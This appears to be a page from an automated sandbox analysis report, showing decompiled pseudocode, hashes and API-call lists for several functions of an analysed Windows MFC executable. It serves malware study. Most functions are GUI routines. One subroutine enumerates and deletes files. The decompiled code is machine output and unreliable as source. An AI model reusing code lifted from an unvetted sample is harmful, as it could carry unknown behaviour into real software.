Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #825$#823H_prolog
String ID:
API String ID: 1008532540-0
Opcode ID: 00b7107851fe791512cf7eddc90873cffb4ea20f7ebae22799c832a40660c797
Instruction ID: 2f8f934b634f41c432f7d4e00069e9b20cc5b8c098b10a1fcd2bd7ff21feef71
Opcode Fuzzy Hash: 00b7107851fe791512cf7eddc90873cffb4ea20f7ebae22799c832a40660c797
Instruction Fuzzy Hash: B221E060A103015BDA187BB69C0AA5F366DAFC9348B10487FB401EB2D7DE7DCC8186ED

Uniqueness

Uniqueness Score: -1.00%

Function 00419AC9, Relevance: 12.1, APIs: 8, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00419AC9(intOrPtr __ecx, void* __eflags) {
				void* _t34;
				void* _t35;
				signed int _t47;
				void* _t72;
				void* _t76;

				E0043E4E0(0x4411a7, _t76);
				 *((intOrPtr*)(_t76 - 0x10)) = __ecx;
				_push(0);
				_t34 = E0041951B(_t76 - 0x1a0);
				_t47 = 1;
				 *(_t76 - 4) = 0;
				 *(_t76 - 0x28) = _t47;
				 *(_t76 - 0x1c) = _t47;
				 *(_t76 - 0x24) = _t47;
				 *(_t76 - 0x20) = _t47;
				L0043DE7A();
				if(_t34 == _t47) {
					L0043E1C2();
					_t72 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 4)))) + 0x7c))();
					if( *(_t76 - 0x24) != 0) {
						E004251F0();
					}
					if( *(_t76 - 0x20) != 0) {
						E004254F6(_t72);
					}
					if( *(_t76 - 0x1c) != 0) {
						E004251E1(_t72);
					}
					if( *(_t76 - 0x28) == 0) {
						L10:
						_push( *((intOrPtr*)(E00429029(_t76 - 0x18, 0xe061))));
						 *(_t76 - 4) = 2;
						_push(0x426);
						L0043E066();
						L0043E15C();
						_t25 = _t76 - 4;
						 *_t25 =  *(_t76 - 4) & 0x00000000;
						__eflags =  *_t25;
					} else {
						_t15 = _t72 + 0x78; // 0x78
						if(E004207A5(_t15) != 0) {
							goto L10;
						} else {
							_push( *((intOrPtr*)(E00429029(_t76 - 0x14, 0xe060))));
							 *(_t76 - 4) = _t47;
							_push(0x426);
							L0043E066();
							L0043E15C();
							 *(_t76 - 4) =  *(_t76 - 4) & 0x00000000;
						}
					}
					L0043DD36();
				}
				 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
				_t35 = E004195B1(_t76 - 0x1a0,  *(_t76 - 4));
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t35;
			}

0x00419ace
0x00419adb
0x00419ae1
0x00419ae8
0x00419af5
0x00419af6
0x00419af9
0x00419afc
0x00419aff
0x00419b02
0x00419b05
0x00419b0c
0x00419b12
0x00419b24
0x00419b26
0x00419b2a
0x00419b2a
0x00419b32
0x00419b36
0x00419b36
0x00419b3e
0x00419b42
0x00419b42
0x00419b4a
0x00419b8a
0x00419b9a
0x00419b9f
0x00419ba3
0x00419ba8
0x00419baf
0x00419bb4
0x00419bb4
0x00419bb4
0x00419b4c
0x00419b4c
0x00419b56
0x00000000
0x00419b58
0x00419b68
0x00419b6d
0x00419b70
0x00419b75
0x00419b7c
0x00419b81
0x00419b85
0x00419b56
0x00419bbb
0x00419bbb
0x00419bc0
0x00419bca
0x00419bd5
0x00419bdd

APIs

__EH_prolog.LIBCMT ref: 00419ACE

Part of subcall function 0041951B: __EH_prolog.LIBCMT ref: 00419520
Part of subcall function 0041951B: #324.MFC42(000000B1,?), ref: 00419535

#2514.MFC42 ref: 00419B05
#1168.MFC42 ref: 00419B12
#3092.MFC42(00000426,00000000), ref: 00419B75
#6199.MFC42(00000426,00000000), ref: 00419B7C
#800.MFC42(00000426,00000000), ref: 00419BBB

Part of subcall function 004251F0: __EH_prolog.LIBCMT ref: 004251F5
Part of subcall function 004251F0: #536.MFC42(0000005C,00000001,00000000,00000000,00000001), ref: 0042520A
Part of subcall function 004251F0: #924.MFC42(?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425225
Part of subcall function 004251F0: #922.MFC42(?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425234
Part of subcall function 004251F0: #924.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425247
Part of subcall function 004251F0: #800.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 00425253
Part of subcall function 004251F0: #800.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 0042525F
Part of subcall function 004251F0: #800.MFC42(?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 0042526B
Part of subcall function 004251F0: FindFirstFileA.KERNEL32(?,?,?,00000000,00454BA4,?,00000000,00000000,?,004558C4,00448FA4,0000005C,00000001,00000000,00000000,00000001), ref: 0042527A
Part of subcall function 004251F0: #537.MFC42(?), ref: 00425295
Part of subcall function 004251F0: #537.MFC42(00448FA4,?), ref: 004252A5
Part of subcall function 004251F0: #922.MFC42(?,004558C4,00000000,00448FA4,?), ref: 004252B4
Part of subcall function 004251F0: #923.MFC42(?,00000000,0000005C,?,004558C4,00000000,00448FA4,?), ref: 004252C4
Part of subcall function 004251F0: #922.MFC42(?,00000000,?,?,00000000,0000005C,?,004558C4,00000000,00448FA4,?), ref: 004252D5
Part of subcall function 004251F0: DeleteFileA.KERNEL32(00000000,?,00000000,?,?,00000000,0000005C,?,004558C4,00000000,00448FA4,?), ref: 004252DC
Part of subcall function 004251F0: #800.MFC42 ref: 004252E5
Part of subcall function 004251F0: #800.MFC42 ref: 004252F1
Part of subcall function 004251F0: #800.MFC42 ref: 004252FD
Part of subcall function 004251F0: #800.MFC42 ref: 00425309
Part of subcall function 004251F0: #800.MFC42 ref: 00425315
Part of subcall function 004251F0: FindNextFileA.KERNEL32(00000000,?), ref: 00425322
Part of subcall function 004251F0: FindClose.KERNEL32(00000000), ref: 00425331

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#3092.MFC42(00000426,00000000), ref: 00419BA8
#6199.MFC42(00000426,00000000), ref: 00419BAF

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537#922FileFindH_prolog$#1168#3092#6199#924$#2514#324#536#923CloseDeleteFirstLoadNextString
String ID:
API String ID: 368402047-0
Opcode ID: 14fcf44b0868c2480d7591fae70aec078731fbc6b862aafbea06c83e026db5e4
Instruction ID: 3d96fd1fcb167d6c4e3b0fec669bcb9cfe4fc85f12ecb2bdae11af778ce44df2
Opcode Fuzzy Hash: 14fcf44b0868c2480d7591fae70aec078731fbc6b862aafbea06c83e026db5e4
Instruction Fuzzy Hash: F8319071E012189BDF24EBA2E8A26EDB7B1FF49304F50005FE001A32C1DB785E44CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041997D, Relevance: 12.1, APIs: 8, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0041997D(signed int __eax, void* __ecx) {
				signed int _t33;
				signed int _t34;
				signed int _t35;
				signed int _t36;
				signed int _t37;
				signed int _t38;
				signed int _t39;
				intOrPtr* _t42;

				_push(0x421);
				L0043DFA6();
				_push(0x427);
				_t33 = __eax & 0xffffff00 | __eax != 0x00000000;
				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x126) = _t33;
				L0043DFA6();
				_push(0x428);
				_t34 = _t33 & 0xffffff00 | _t33 != 0x00000000;
				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x680) = _t34;
				L0043DFA6();
				_push(0x429);
				_t35 = _t34 & 0xffffff00 | _t34 != 0x00000000;
				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x137) = _t35;
				L0043DFA6();
				_push(0x42a);
				_t36 = _t35 & 0xffffff00 | _t35 != 0x00000000;
				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x13c) = _t36;
				L0043DFA6();
				_push(0x80f);
				_t37 = _t36 & 0xffffff00 | _t36 != 0x00000000;
				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x141) = _t37;
				L0043DFA6();
				_t38 = _t37 & 0xffffff00 | _t37 != 0x00000000;
				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x147) = _t38;
				_push(0x42b);
				L0043DFA6();
				_push(0);
				_t39 = _t38 & 0xffffff00 | _t38 != 0x00000000;
				 *( *((intOrPtr*)(__ecx + 0x64)) + 0x1068) = _t39;
				_push(0);
				_push(0x42b);
				L0043E2DC();
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x64)) + 0x67c)) = _t39 - 1;
				_t42 =  *((intOrPtr*)(__ecx + 0x64)) + 0x67c;
				if( *_t42 < 0) {
					 *_t42 = 1;
				}
				return E0040E7EB(_t42);
			}

0x00419981
0x00419986
0x0041998e
0x00419995
0x00419998
0x004199a0
0x004199a8
0x004199af
0x004199b2
0x004199ba
0x004199c2
0x004199c9
0x004199cc
0x004199d4
0x004199dc
0x004199e3
0x004199e6
0x004199ee
0x004199f6
0x004199fd
0x00419a00
0x00419a08
0x00419a17
0x00419a1a
0x00419a20
0x00419a23
0x00419a2b
0x00419a2f
0x00419a32
0x00419a38
0x00419a3a
0x00419a3d
0x00419a46
0x00419a4f
0x00419a57
0x00419a59
0x00419a59
0x00419a68

APIs

#4055.MFC42(00000421), ref: 00419986
#4055.MFC42(00000427,00000421), ref: 004199A0
#4055.MFC42(00000428,00000427,00000421), ref: 004199BA
#4055.MFC42(00000429,00000428,00000427,00000421), ref: 004199D4
#4055.MFC42(0000042A,00000429,00000428,00000427,00000421), ref: 004199EE
#4055.MFC42(0000080F,0000042A,00000429,00000428,00000427,00000421), ref: 00419A08
#4055.MFC42(0000042B,0000080F,0000042A,00000429,00000428,00000427,00000421), ref: 00419A23
#3095.MFC42(0000042B,00000000,00000000,0000042B,0000080F,0000042A,00000429,00000428,00000427,00000421), ref: 00419A3D

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #4055$#3095
String ID:
API String ID: 2285405428-0
Opcode ID: 19569031abd39eac3635899f541cf5561763a7ef0a2fc7afa1f0b5a300933956
Instruction ID: a60ff1a8bbf60ce52df437a49ade33641bfed4daf88a0348010dd32641ffab73
Opcode Fuzzy Hash: 19569031abd39eac3635899f541cf5561763a7ef0a2fc7afa1f0b5a300933956
Instruction Fuzzy Hash: 13210531301B418FE215AA668952B9E76966FD8B14F08007EB6868F3C3DF599E13CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0040CBA6, Relevance: 12.1, APIs: 8, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040CBA6(void* __ecx) {
				intOrPtr _v276;
				intOrPtr _v280;
				int _v284;
				int _v288;
				void* _v304;
				void* __ebp;
				struct HWND__* _t18;
				struct HWND__* _t19;
				int _t20;
				void* _t24;
				struct tagRECT* _t34;

				_t35 = __ecx;
				L0043E192();
				if( *((intOrPtr*)(__ecx + 0xb0)) != 0) {
					return E0040C88B(__ecx);
				}
				_t34 = __ecx + 0xb4;
				GetWindowRect( *(__ecx + 0x20), _t34);
				_t18 = GetParent( *(_t35 + 0x20));
				_push(_t18);
				L0043DD9C();
				if(_t18 != 0) {
					_push(_t34);
					L0043E02A();
				}
				_t24 = _t35 + 0x54;
				if(_t24 != 0) {
					_t19 =  *(_t24 + 0x20);
				} else {
					_t19 = 0;
				}
				_t20 = IsWindow(_t19);
				if(_t20 != 0) {
					_push(1);
					_t20 =  &_v304;
					_push(_t35);
					_push(_t20);
					L0043E198();
					if(_t20 != 0) {
						_v288 = 0;
						_v284 = 0;
						_v280 = _t34->right - _t34->left;
						_v276 = _t34->bottom - _t34->top;
						return SendMessageA( *(_t35 + 0x74), 0x409, 0,  &_v304);
					}
				}
				return _t20;
			}

0x0040cbb2
0x0040cbb4
0x0040cbc0
0x00000000
0x0040cbc4
0x0040cbce
0x0040cbd8
0x0040cbe1
0x0040cbe7
0x0040cbe8
0x0040cbef
0x0040cbf1
0x0040cbf4
0x0040cbf4
0x0040cbf9
0x0040cbfe
0x0040cc04
0x0040cc00
0x0040cc00
0x0040cc00
0x0040cc08
0x0040cc10
0x0040cc12
0x0040cc14
0x0040cc1a
0x0040cc1b
0x0040cc1e
0x0040cc25
0x0040cc2e
0x0040cc34
0x0040cc3a
0x0040cc46
0x00000000
0x0040cc5c
0x0040cc25
0x0040cc66

APIs

#2379.MFC42 ref: 0040CBB4
GetWindowRect.USER32 ref: 0040CBD8
GetParent.USER32(?), ref: 0040CBE1
#2864.MFC42(00000000), ref: 0040CBE8
#6880.MFC42(?,00000000), ref: 0040CBF4
IsWindow.USER32(?), ref: 0040CC08
#3812.MFC42(?,?,00000001), ref: 0040CC1E
SendMessageA.USER32(?,00000409,00000000,?), ref: 0040CC5C

Part of subcall function 0040C88B: __EH_prolog.LIBCMT ref: 0040C890
Part of subcall function 0040C88B: GetParent.USER32(?), ref: 0040C8AF
Part of subcall function 0040C88B: #2864.MFC42(00000000,?,00000000), ref: 0040C8B6
Part of subcall function 0040C88B: IsWindow.USER32(?), ref: 0040CA32
Part of subcall function 0040C88B: #3812.MFC42(?,?,00000001,?,?,00000000,?,00000000), ref: 0040CA48
Part of subcall function 0040C88B: SendMessageA.USER32(?,00000409,00000000,?), ref: 0040CA87
Part of subcall function 0040C88B: #6197.MFC42(00000000,?,?,?,?,00000004,?,?,00000000,?,00000000), ref: 0040CAA7

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Window$#2864#3812MessageParentSend$#2379#6197#6880H_prologRect
String ID:
API String ID: 1908715994-0
Opcode ID: 217a9c0f6aef29db535d6a8773f2a39317cb6fbf7bb4448d2fd5f07836a4adc4
Instruction ID: 5dd8543b210df8cbc6301b685941933159a3f935ca7b8e1ceec604a8764b6994
Opcode Fuzzy Hash: 217a9c0f6aef29db535d6a8773f2a39317cb6fbf7bb4448d2fd5f07836a4adc4
Instruction Fuzzy Hash: 4D117571600204DBDB249B75DD89BABB7B8FF49704F00457EB64AA2191DB74E904CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D043, Relevance: 12.1, APIs: 8, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040D043(void* __ecx, void* __eflags) {
				int _t30;
				int _t31;
				void* _t50;
				void* _t52;
				signed int _t61;

				E0043E4E0(0x43fe30, _t52);
				_t50 = __ecx;
				_t47 = __ecx + 0xdc;
				 *((intOrPtr*)(_t52 - 0x18)) = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(E0040D10A(__ecx + 0xdc, _t52 - 0x1c))) - 8)) != 0) {
					L2:
					 *((char*)(_t52 - 0xd)) = 0;
				} else {
					 *((char*)(_t52 - 0xd)) = 1;
					if( *((intOrPtr*)(_t50 + 0x10c)) == 0) {
						goto L2;
					}
				}
				L0043DD36();
				if( *((intOrPtr*)(_t52 - 0xd)) != 0) {
					L0043DDD8();
					_push(_t52 - 0x14);
					 *(_t52 - 4) = 0;
					L0043E19E();
					_push( *((intOrPtr*)(_t52 - 0x14)));
					L0043DDD2();
					_t15 = _t52 - 4;
					 *_t15 =  *(_t52 - 4) | 0xffffffff;
					_t61 =  *_t15;
					 *((intOrPtr*)(_t52 - 0x18)) = 1;
					L0043DD36();
				}
				_t30 = E0040C33B(_t47, _t61,  *((intOrPtr*)(_t50 + 0x110)));
				if(_t30 != 0) {
					_t31 = 1;
					 *(_t50 + 0xd8) = _t31;
					_t30 = InvalidateRect( *(_t50 + 0x20), 0, _t31);
				}
				if( *((intOrPtr*)(_t52 - 0x18)) != 0) {
					_push(0);
					L0043DDD2();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return _t30;
			}

0x0040d048
0x0040d052
0x0040d05a
0x0040d063
0x0040d070
0x0040d07e
0x0040d07e
0x0040d072
0x0040d078
0x0040d07c
0x00000000
0x00000000
0x0040d07c
0x0040d084
0x0040d08c
0x0040d091
0x0040d09b
0x0040d09c
0x0040d09f
0x0040d0a4
0x0040d0ad
0x0040d0b2
0x0040d0b2
0x0040d0b2
0x0040d0b9
0x0040d0c0
0x0040d0c0
0x0040d0cd
0x0040d0d4
0x0040d0d8
0x0040d0de
0x0040d0e4
0x0040d0e4
0x0040d0ed
0x0040d0ef
0x0040d0f6
0x0040d0f6
0x0040d101
0x0040d109

APIs

__EH_prolog.LIBCMT ref: 0040D048

Part of subcall function 0040D10A: #535.MFC42 ref: 0040D119

#800.MFC42 ref: 0040D084
#540.MFC42 ref: 0040D091
#3874.MFC42(?), ref: 0040D09F
#860.MFC42(?,?), ref: 0040D0AD
#800.MFC42(?,?), ref: 0040D0C0
InvalidateRect.USER32(00000001,00000000,00000001), ref: 0040D0E4
#860.MFC42(00000000), ref: 0040D0F6

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800#860$#3874#535#540H_prologInvalidateRect
String ID:
API String ID: 3569524829-0
Opcode ID: 6dde902e2506b9484173b80bc5f34d704e207979634fdfff0c355e8171c36650
Instruction ID: 35d029efc173b899b4b1fd727296ff07a82f7a86662d732049d703d180541d28
Opcode Fuzzy Hash: 6dde902e2506b9484173b80bc5f34d704e207979634fdfff0c355e8171c36650
Instruction Fuzzy Hash: 3521A471D002099FCB20EBA5C491AEFBBB4EF08308F10882FE05A721D1DB781A49CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00403C83, Relevance: 12.1, APIs: 8, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00403C83(signed int __ecx, void* __edi) {
				intOrPtr _t24;
				intOrPtr* _t25;
				intOrPtr _t29;
				signed int _t41;
				intOrPtr* _t43;
				void* _t44;

				_t24 = E0043E4E0(E0043EF65, _t44);
				_push(__ecx);
				_t41 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_t25 =  *((intOrPtr*)(__ecx + 8));
					_push(0x14);
					if( *((intOrPtr*)(_t25 - 8)) == 0) {
						L0043DD54();
						_t43 = _t25;
						 *((intOrPtr*)(_t44 - 0x10)) = _t43;
						 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
						if(_t43 == 0) {
							_t41 = 0;
						} else {
							L0043DDDE();
							 *(_t44 - 4) = 1;
							L0043DDD8();
							 *(_t43 + 0xc) =  *(_t43 + 0xc) | 0xffffffff;
							_push(0);
							 *(_t44 - 4) = 2;
							 *_t43 = 0x445490;
							 *(_t43 + 8) = 3;
							L0043DDD2();
						}
						 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
						_t25 = _t44 + 8;
						_push(0x44aa90);
						_push(_t25);
						 *(_t44 + 8) = _t41;
						L0043E528();
					}
					L0043DD54();
					_t29 = _t25;
					 *((intOrPtr*)(_t44 - 0x10)) = _t29;
					 *(_t44 - 4) = 3;
					if(_t29 == 0) {
						_t24 = 0;
					} else {
						_t24 =  *((intOrPtr*)(_t41 + 8));
						_push( *(_t44 + 8) & 0x000000bf | 0x00000080);
						_push(_t24);
						L0043DE02();
					}
					 *((intOrPtr*)(_t41 + 4)) = _t24;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
				return _t24;
			}

0x00403c88
0x00403c8d
0x00403c8f
0x00403c95
0x00403c9b
0x00403c9e
0x00403ca4
0x00403ca6
0x00403cab
0x00403cae
0x00403cb1
0x00403cb7
0x00403cf0
0x00403cb9
0x00403cbc
0x00403cc4
0x00403cca
0x00403ccf
0x00403cd3
0x00403cd7
0x00403cdb
0x00403ce1
0x00403ce8
0x00403ced
0x00403cf2
0x00403cf6
0x00403cf9
0x00403cfe
0x00403cff
0x00403d02
0x00403d02
0x00403d07
0x00403d0d
0x00403d0f
0x00403d14
0x00403d1b
0x00403d32
0x00403d1d
0x00403d20
0x00403d29
0x00403d2a
0x00403d2b
0x00403d2b
0x00403d34
0x00403d34
0x00403d3b
0x00403d43

APIs

__EH_prolog.LIBCMT ref: 00403C88
#823.MFC42(00000014), ref: 00403CA6
#350.MFC42 ref: 00403CBC
#540.MFC42 ref: 00403CCA
#860.MFC42(00000000), ref: 00403CE8
_CxxThrowException.MSVCRT(?,0044AA90), ref: 00403D02
#823.MFC42(00000014), ref: 00403D07
#532.MFC42(?,?), ref: 00403D2B

Memory Dump Source

Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #823$#350#532#540#860ExceptionH_prologThrow
String ID:
API String ID: 3636128287-0
